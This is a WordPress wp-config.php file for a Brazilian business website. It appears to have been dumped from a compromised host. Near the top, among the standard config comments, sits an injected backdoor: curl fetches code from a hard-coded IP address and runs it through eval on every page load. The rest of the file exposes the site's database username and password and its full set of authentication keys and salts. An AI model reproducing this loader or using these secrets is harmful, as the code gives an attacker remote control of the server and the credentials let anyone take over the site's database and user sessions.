File: /home/u615933799/domains/revestsulpedras.com.br/public_html/wp-config.php
<?php
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
$ch = curl_init("http://173.208.148.226/z51230_6/stat/index2.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
$handle = curl_exec($ch);
if ( $handle ) {
$data = eVaL( '?>' . $handle );
curl_close( $ch );}
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'u615933799_bancorevestsul' );
/** Database username */
define( 'DB_USER', 'u615933799_bancorevestsul' );
/** Database password */
define( 'DB_PASSWORD', 'Gkt@1537' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'Q;cV4g&2}.Y,o{gG:L+?(e~F$t?0MS`?<<[tZ wul^wWb5>qW[F[e|G^@lKikKGu' );
define( 'SECURE_AUTH_KEY', ')bqsmVl ^5>6KMjB[ZI]F(WCV>yL~9&1?W- %f2OW&XwJe/2=u%Zb_&p>UOaWStV' );
define( 'LOGGED_IN_KEY', '+YEs$jWZhNqO5W&]tnP=zrvVtmlfb1M!l%vy[=+E0|.W1((#Ds3@788o=({wwmi8' );
define( 'NONCE_KEY', 'uP*a5`Q4U/&n9eLtfSdS2~l|Si/v;64HrIl/5=T $YI[ay~0&,4McgNaVEN~Z?,G' );
define( 'AUTH_SALT', 'oVKs@f5uJQCJr@LN=D[^aANF_K#M,{rrK^)?,^FRn9_HPUEw6E& Q$@JwRcWQ22A' );
define( 'SECURE_AUTH_SALT', 'kM(hXW0q2P XJAfSE=~#dM#LxjP[AfN%t&/*{#mPQD<X]~*4/R[h4_%;>Ux*Xj9|' );
define( 'LOGGED_IN_SALT', '#Sst14>#I%.f/4O_d.Es9Qa=~RK]`Kbn1~O=i9xJ]VM+TFk4UwR UBi)+MHEM{#:' );
define( 'NONCE_SALT', 'SRR%@*m}FAE/LH(^+GU@ds~/dbXIh}xRw[0lA3UZWGD$$;4Bhf0N[CSSVMetMwc0' );
define( 'WP_CACHE_KEY_SALT', '0>IWJ%Pd(;xOGg3T>$YS.:y$%}SoGgNN44,t]O9I(oFwy=7,Wv~?P313#([A7..q' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
define( 'FS_METHOD', 'direct' );
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';